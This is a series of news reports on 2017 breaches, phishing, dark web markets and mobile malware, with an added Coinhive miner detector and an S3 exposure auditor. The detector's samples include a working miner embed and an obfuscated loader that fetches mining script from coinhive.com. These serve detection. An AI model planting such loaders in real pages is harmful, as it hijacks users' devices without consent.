CYBERCRIMINALS LAUNCH ‘BLACK MARKET FOR ANDROID USERS’ AS DARK WEB GOES MOBILE
In the wake of police action and drug market closures this year, dark web users are turning toward secretive mobile services and mainstream messaging apps, research suggests. The IntSights team found mobile dark web activity was spiking, with many people using mainstream services like Discord, Telegram and WhatsApp to trade illicit goods – including credit cards, breached records, hacking tools and illegal drugs. “Our findings suggest Discord is becoming the go-to app for mobile dark web discussions,” the team said, referencing the chat service typically used by gamers. Yet mobile devices are not only being used for chatting: some enterprising cybercriminals are building dedicated marketplaces for Android users, taking full advantage of Orbot – the Android app, maintained by the Guardian Project, that routes a device’s traffic through the Tor network – to launch new black markets masked by the anonymity Tor provides. “[Matanga] offers its mobile-first clients easy access to the services of the dark web from their mobile device and we expect to see more dark web vendors creating similar apps in the future,” the researchers said. The dark web, which is protected by anonymity technology including Tor, is increasingly accused of aiding criminality and terrorism. “The anonymity promised by dark web networks such as Tor and I2P was the key reason for their popularity among cybercriminals,” said Guy Nizan, IntSights co-founder and CEO. “Now that the dark web is no longer safe for hackers they are moving to messaging platforms and conducting their illicit activities on the same apps that millions use every day.” While the use of messaging apps for illicit activity has been on the rise for some time, the closure of AlphaBay and Hansa and the suspected compromise of Dream Market.
IS YOUR IPHONE SPYING ON YOU? IOS APPS CAN SECRETLY TURN ON YOUR CAMERA AND TAKE VIDEO
When you download an iOS application, especially one in the social media category, one of the most common permissions you will grant it is access to the iPhone’s camera, and users often do so soon after installing. It is easy to hit the ‘Allow’ button and forget about it, but Google researcher Felix Krause has warned that doing so can let iOS applications run wild – and may jeopardise your privacy. In his analysis, published this week (25 October), Krause said that giving an app access to the camera lets it take images without your consent, secretly record you and even run cutting-edge face tracking features. Once you take and post one picture or video via a social network app, you have granted it full access to the camera, and any time the app is running in the foreground it can use the camera again without asking. Krause, who recently discovered a convincing phishing scam targeting Apple devices, said that some iOS apps can “live stream their camera onto the internet” and use the front and back cameras to judge the user’s location. Such apps – a messaging app or any newsfeed-based app, for instance – can easily track the user’s face, take pictures, or live stream from the front and back camera, without the user’s consent. Additionally, thanks to Apple’s new Vision framework in the most recent iOS release, camera access can now be used to gauge the “emotions” of users and “detect if the user is on their phone alone or watching together with a second person”. In a video uploaded to YouTube, Krause demonstrated just how easy it would be to snoop on users via the camera by building a fake social media-style iOS application. The researcher said that users can protect themselves with camera covers, but advised that Apple should design a method of granting apps only temporary access to the camera.
HACKERS COULD HIJACK LG’S SMART HOME PRODUCTS TO SPY ON YOU IN REAL TIME
Critical bugs were found in the mobile application and cloud platform linked to LG’s SmartThinQ range of smart home appliances. Experts from cyber firm Check Point, who dubbed the flaws “HomeHack”, were able to exploit the bugs to take control of LG user accounts which, by extension, gave them access to the connected devices. Referring to a camera-equipped appliance in the range, Check Point said in a blog post: “This camera, in the case of account takeover, would allow the attacker to spy on the victim’s home, with no way of them knowing, with all the obvious negative consequences of invasion of privacy and personal security violation.” In 2016, LG said that 80m smart home devices had been shipped worldwide. “As more and more smart devices are being used in the home, hackers will shift their focus from targeting individual devices to hacking the apps that control networks of devices,” said Oded Vanunu, head of products and vulnerability research at Check Point. “Users need to be aware of the security and privacy risks when using their IoT devices and it is essential that IoT manufacturers focus on protecting smart devices against attacks by implementing robust security during the design of software.” The HomeHack vulnerabilities were disclosed to LG on 31 July 2017, with the electronics firm patching the SmartThinQ app at the end of September. Koonseok Lee, manager of LG’s smart development team, said: “LG Electronics plans to continue strengthening its software security systems as well as work with cybersecurity solution providers like Check Point to provide safer and more convenient appliances.” Check Point advised users to ensure they have the latest version of the mobile app installed – available via Google Play and Apple’s App Store – and to update the LG smart home appliances themselves to the latest software version via the SmartThinQ application dashboard.
USB STICK FOUND IN STREET CONTAINS HEATHROW AIRPORT SECURITY INFORMATION
A USB stick found lying in the street and plugged into a library computer did not, as the finder might have feared, ruin the machine; instead it revealed highly confidential information linked to the security procedures of one of the world’s busiest airports, according to the Sunday Mirror. None of the data on the flash drive was encrypted or password protected, allowing the man to explore 76 folders holding sensitive security information for London’s Heathrow airport. Containing “maps, videos, and documents,” the data revealed, for example, the route the Queen and her entourage take when heading to and from the airport, and the security measures put in place to ensure her safety. The stick also contained details of all the different kinds of identification required to enter the airport’s restricted areas – including for undercover police officers – and “maps pinpointing CCTV cameras and a network of tunnels and escape shafts linked to the Heathrow Express,” the train route that runs between the airport and central London. Heathrow said in a statement that passenger and staff safety was its “top priority,” adding that it was confident the airport was “secure.” Unnamed sources connected with the airport told the news outlet that those looking into the matter were keen to discover if the incident was the result of an “incompetent data breach” or if someone had intentionally transferred the information onto the drive and taken it off site, possibly for nefarious purposes such as terror or cyberattacks. While slotting a found USB stick into a computer is certainly a risky thing to do, in this case it appears to have exposed a monumental lapse in security that is certain to force the airport into conducting a full review of the way it handles sensitive data. The idea that someone working at the airport may have secretly transferred the data onto a stick and then taken it away from the site
MASSIVE DATA BREACH HITS MALAYSIA AS OVER 46 MILLION PEOPLE’S DATA ENDS UP ON DARK WEB
Malaysia has been hit with a massive data breach, as the records of over 46 million mobile phone subscribers ended up for sale on the dark web. An unknown hacker is reported to have put up millions of sensitive records stolen from Malaysian telecoms and network operators for sale. According to local reports, the data of mobile number subscribers appears to have come from major local operators including DiGi, Celcom, Maxis, Tunetalk, Redtone and Altel. According to the local site that was the first to report the breach, the records came from a massive breach thought to have occurred in 2014. The leaked data includes users’ names, prepaid and postpaid phone numbers, addresses, customer details and SIM card data. The number of records exceeds Malaysia’s population of roughly 32 million, which indicates that the leaked data may include people with multiple mobile numbers. The dark web listing also reportedly contained databases of over 80,000 compromised records from the Malaysian Medical Council (MMC), the Malaysian Medical Association (MMA) and the Malaysian Dental Association (MDA). It is still unclear how such a massive trove of data from what appears to be multiple sources came to be compromised and then put up for sale on the dark web. IBTimes UK has not independently verified the validity of the data allegedly up for sale. The site’s founder, Vijandren Ramadass, told The Star that it had handed over all the samples of the stolen data it had received from the hacker to the Malaysian Communications and Multimedia Commission.
GOOGLE PLAY STORE PLAGUED BY HIDDEN CRYPTOCURRENCY MINING MALWARE ATTACKING ANDROID PHONES
Mobile software found on Google’s Play Store, the official application marketplace, contains malware that infects Android devices and clandestinely mines cryptocurrency. Mining malware works by hijacking a device’s computing power in order to “mine” digital currency, in this case Monero. “As cryptocurrencies have grown in popularity and value, cryptocurrency mining has turned into a lucrative business,” said Chris Olson, CEO of web monitoring firm The Media Trust. “This enslaving is typically accomplished by surreptitiously inserting code into popular services which, when accessed by a user, executes and downloads a file on the user device.” Coinhive, a popular in-browser mining script, was recently found on The Pirate Bay. While browser-based mining of this kind is well known, it appears that cryptocurrency-focused malware is increasingly targeting smartphone users; some details remain unknown, but experts say it is unusual for such malware to target mobiles. “These threats highlight how even mobile devices can be used for cryptocurrency mining activities, even if, in practice, the effort results in an insignificant amount of profit,” Trend Micro’s mobile threat response team wrote in its analysis. Most users only notice when the device experiences unexpected behaviour. “Users should take note of any performance degradation on their devices after installing an app,” it added.
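Coinhive-style mining is delivered as JavaScript, so the first thing a responder wants is a way to spot it in captured web content or in the JavaScript bundled inside an app. The scanner below is an added example written for this page, not code from Trend Micro, Coinhive or any of the apps discussed, and it assumes the miner is delivered as JavaScript. The indicator list (the coinhive.min.js loader, the CoinHive.Anonymous/User/Token API calls, the coinhive.com domain and stratum+tcp pool URLs) and the four sample pages are constructed for illustration; the normalisation step undoes two cheap string-splitting tricks before matching, because a scanner that only greps for the literal library name is trivially evaded.

```python
"""Flag Coinhive-style in-browser miner indicators in web content.

Added example; the indicator list and the sample pages below are constructed
for illustration, not taken from Trend Micro's report or the Play Store apps.
"""
import re

# Indicators (assumed, based on the public Coinhive library and pool protocol):
# the loader script, the JS API entry points, the delivery domain and a raw
# mining-pool URL, which a web page has no legitimate reason to contain.
INDICATORS = [
    ("coinhive-loader", re.compile(r"coinhive\.min\.js", re.I)),
    ("coinhive-api", re.compile(r"CoinHive\.(Anonymous|User|Token)\s*\(", re.I)),
    ("coinhive-domain", re.compile(r"coin-?hive\.com", re.I)),
    ("stratum-url", re.compile(r"stratum\+tcps?://", re.I)),
]

_HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
_UNI_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_CONCAT = re.compile(r"""(['"])\s*\+\s*\1""")  # matches  ' + '  or  " + "


def normalize(text):
    """Undo two cheap obfuscations so the indicators match again:
    JS hex/unicode escapes (\\x73tratum) and split string literals ('coin' + 'hive')."""
    text = _HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = _UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    return _CONCAT.sub("", text)


def find_miner_indicators(text):
    """Return (line_number, indicator_name) pairs found in the normalised content."""
    findings = []
    for lineno, line in enumerate(normalize(text).splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.append((lineno, name))
    return findings


# Constructed samples: a clean page, a page that embeds the miner openly,
# a loader assembled from split strings, and a hex-escaped pool URL.
CLEAN_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body>Loading...</body></html>"""

MINER_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</head><body>Loading...</body></html>"""

OBFUSCATED_LOADER = """<script>
var s = document.createElement('script');
s.src = 'https://' + 'coin' + 'hive.com/lib/coin' + 'hive.min.js';
document.head.appendChild(s);
</script>"""

HEX_POOL = r"var pool = '\x73tratum+tcp://pool.example.invalid:3333';"

if __name__ == "__main__":
    for label, sample in [("clean", CLEAN_PAGE), ("miner", MINER_PAGE),
                          ("obfuscated", OBFUSCATED_LOADER), ("hex", HEX_POOL)]:
        print(label, find_miner_indicators(sample))
```

Point it at the HTML and JavaScript unpacked from an APK's assets, or at proxy captures of what an app's WebView loads, and treat any hit as a reason to look at the app's CPU use. A scanner like this only catches the indicators it knows; sustained CPU load and battery drain after installing an app, as Trend Micro notes, remain the user-visible signal.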
AUSTRALIA DATA LEAK: NEARLY 50,000 GOVERNMENT AND PRIVATE STAFFERS’ SENSITIVE DATA PUBLICLY EXPOSED
In yet another accidental data breach, sensitive and personal information of nearly 50,000 Australians was reportedly left freely exposed online. The data was allegedly left exposed in a misconfigured Amazon S3 bucket, presumably left unsecured by a third-party contractor. The breach, which is reportedly now considered the largest since last year’s Red Cross breach, affected employees of both government agencies and private firms. It reportedly affected 3,000 employees at the Department of Finance, 1,470 staffers at the Australian Electoral Commission and 300 employees at the National Disability Insurance Agency. Around 17,000 staff records from utility UGL and 1,500 employees’ data from Sydney-headquartered Rabobank were also exposed. However, financial services firm AMP was reportedly the worst affected, with over 25,000 staffers’ records freely exposed to the public as a result of the misconfigured bucket. The exposed data reportedly included names, IDs, passwords, phone numbers, addresses, credit card information, staff salary details and more. The security researcher who found the bucket, named in reports only as Wojciech, reportedly claims that he alerted the Australian defence department and AMP about the breach in October, but only received a response from the government agency. AMP confirmed that a “limited amount of company data” detailing staff expenses had been unknowingly exposed by a third-party contractor. It remains unclear how long the data was publicly accessible before Wojciech stumbled onto it.
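Whether an S3 bucket is world-readable is decided in two places, its ACL and its bucket policy, and a check that looks at only one of them misses the other. The following is an added example (not code from the page, from AMP, or from any contractor involved) that audits both offline, on documents in the shape boto3’s get_bucket_acl() and get_bucket_policy() return. The weak and fixed documents, the bucket name and the account ID are constructed for illustration.

```python
"""Flag S3 ACL grants and bucket-policy statements that expose a bucket to everyone.

Added example. Works offline on ACL / policy documents in the shape boto3's
get_bucket_acl() and get_bucket_policy() return; the sample documents are constructed.
"""
import json

# Well-known S3 group URIs: AllUsers is the whole internet, AuthenticatedUsers is
# any AWS account at all, which in practice is also the whole internet.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Return (group, permission) pairs for every ACL grant made to a public group."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append((PUBLIC_GROUPS[grantee["URI"]], grant["Permission"]))
    return findings


def _principal_is_everyone(principal):
    # Principal may be the string "*" or {"AWS": "*"} / {"AWS": ["*", ...]}.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = [aws] if isinstance(aws, str) else aws
        return "*" in aws
    return False


def public_policy_statements(policy):
    """Return Sids of Allow statements open to any principal and not narrowed by a Condition."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow" or not _principal_is_everyone(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            # A Condition (aws:SourceIp, aws:SourceVpce, ...) may restrict the grant;
            # such statements need a human look rather than an automatic verdict.
            continue
        findings.append(stmt.get("Sid", "<no Sid>"))
    return findings


def audit(acl, policy):
    """True when either mechanism exposes the bucket to everyone."""
    return bool(public_acl_grants(acl) or public_policy_statements(policy))


# Constructed sample: the ACL shape that leaves a bucket listable by anyone.
WEAK_ACL = {
    "Owner": {"ID": "exampleownerid"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "exampleownerid"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}

# Hardened version: only the owner holds a grant.
FIXED_ACL = {
    "Owner": {"ID": "exampleownerid"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "exampleownerid"}, "Permission": "FULL_CONTROL"},
    ],
}

# Constructed policies; the bucket name and the account ID 111122223333 are placeholders.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-contractor-bucket/*"},
    ],
})

FIXED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ContractorRoleRead", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:role/contractor-upload"},
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-contractor-bucket/*"},
    ],
})

if __name__ == "__main__":
    for label, acl, policy in (("weak", WEAK_ACL, WEAK_POLICY), ("fixed", FIXED_ACL, FIXED_POLICY)):
        print(label, "exposed:", audit(acl, policy), public_acl_grants(acl), public_policy_statements(policy))
```

Against a live account, feed it `s3.get_bucket_acl(Bucket=name)` and `s3.get_bucket_policy(Bucket=name)["Policy"]` for every bucket, and remember that object ACLs can make individual objects public even when the bucket ACL and policy are clean. Amazon’s account-level S3 Block Public Access setting, introduced in 2018 and so not available at the time of this breach, overrides both mechanisms and is the simplest way to make a contractor’s misconfiguration harmless.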
‘HOLY GRAIL OF GOOGLE BUGS’ EXPOSED FIRM’S FULL VULNERABILITY DATABASE OF KNOWN AND UNPATCHED FLAWS
A security researcher uncovered a series of bugs in Google’s internal bug tracking platform, called Google Issue Tracker aka the Buganizer, which allowed him access to Google’s entire database of known and unpatched vulnerabilities. Security researcher Alex Birsan found three flaws within Google Issue Tracker, which is normally only accessible to internal Googlers monitoring bugs in the firm’s products. Birsan said he created a fake Google corporate email account, which he then used to trick the Buganizer into thinking he was a legitimate Google employee. This gave him higher privileges to view bug reports and also to receive updates and notifications on issues. The most serious of the flaws gave Birsan access to the platform itself, which in turn allowed him to view the firm’s entire list of dangerous vulnerabilities. “Exploiting this bug gives you access to every vulnerability report anyone sends to Google until they catch on to the fact that you’re spying on them,” Birsan told Motherboard. According to Birsan, the flaws could be considered the “Holy Grail of Google bugs” given the kind of access they provided. Google patched the flaws after Birsan reported them to the firm. Google rewarded the researcher with over $15,000 in bug bounties, and he was also given a grant of an additional $3,133 to continue his research on vulnerabilities in the Issue Tracker, ZDNet reported. “I’m very happy with the extra cash, and looking forward to finding bugs in other Google products,” Birsan said.
WATCH OUT FOR THIS PASSWORD-STEALING FACEBOOK HACK THAT’S HITTING IOS AND ANDROID USERS
A phishing campaign has been spotted spreading via Facebook Messenger and targeting users across Europe, including Germany, Sweden and Finland, security experts have warned. Frederic Vila, a security researcher with Helsinki-based F-Secure, said on Monday (30 October) that criminals were using a redirection technique to send users to a malicious phishing page. The ultimate aim was to steal the passwords of victims on both iOS and Android. Links were sent posing as YouTube videos, but the hackers used URL shorteners including “po.st” and “utm.io” to hide where users would end up. Based on forensic analysis of the link data over a two-week period, the scheme was launched on 15 October and had reached 200,000 clicks in total. According to F-Secure, the operation expanded as more passwords were scooped up – with the hackers also exploiting the hijacked accounts for ad fraud. Vila wrote: “Cybercriminals used those stolen credentials to spread the malicious links, and subsequently gather more credentials. “While in the process of stealing the credentials, the cybercriminals also attempted to earn from other non-iOS and non-Android users through ad-fraud.” The expert said that such phishing schemes are made worse, in part, because Facebook lets those on the platform use a general email address as a username, so a stolen Facebook login is often a valid login elsewhere. Vila said: “Just by launching this Facebook phishing campaign, [hackers] harvest email and password credentials that are later on used for secondary attacks such as gaining access to other systems or services that could have a bigger monetary value. “We highly recommend the affected users to change their passwords as soon as possible, including other systems and services where the same compromised password was used.” It is not the first time phishing scams have been caught spreading via the popular social network.
In late August this year, security experts from Russia’s Kaspersky Lab found cybercriminals were using the Messenger service to circulate malicious links to “advanced” forms of adware.
DARK OVERLORD HACKERS REVEAL PLANS TO LEAK ‘HOLLYWOOD DATABASE STOLEN FROM TOP STUDIO’
Hacking group The Dark Overlord is threatening to leak the internal client data of Hollywood production studio Line 204, IBTimes UK has learned. The seemingly international group of hackers, which recently targeted streaming giant Netflix and a London-based plastic surgeon’s office, provided evidence that it had accessed the firm’s customer database. Based on one section of the database labelled ‘CustomerFile’, Line 204 clients have in the past included Apple, Netflix, Funny or Die, ABC, HBO, Hulu and many more. The collective is known to hack targets and then approach them to demand money in exchange for not leaking the stolen information. “As with all of our friends who don’t accept one of our handsome business proposals, we’ll handle them appropriately by publicly releasing all their client data, documents, intellectual property, and other sensitive documentation,” the group said via encrypted chat. “We’ve only begun,” one member of the group added. On Tuesday (31 October), Line 204 confirmed the attack on its network and said it had contacted the FBI to help probe the loss of potentially sensitive client data. Alton Butler, CEO of Line 204, confirmed in a statement sent via a PR staffer that an “international cyberattack organisation” had accessed its database on 26 October. He said: “This group has hit other studios in the past year and is trying to continue their destructive path with Line 204.” The Dark Overlord hackers, whose identities remain a mystery, in turn called out Butler by name.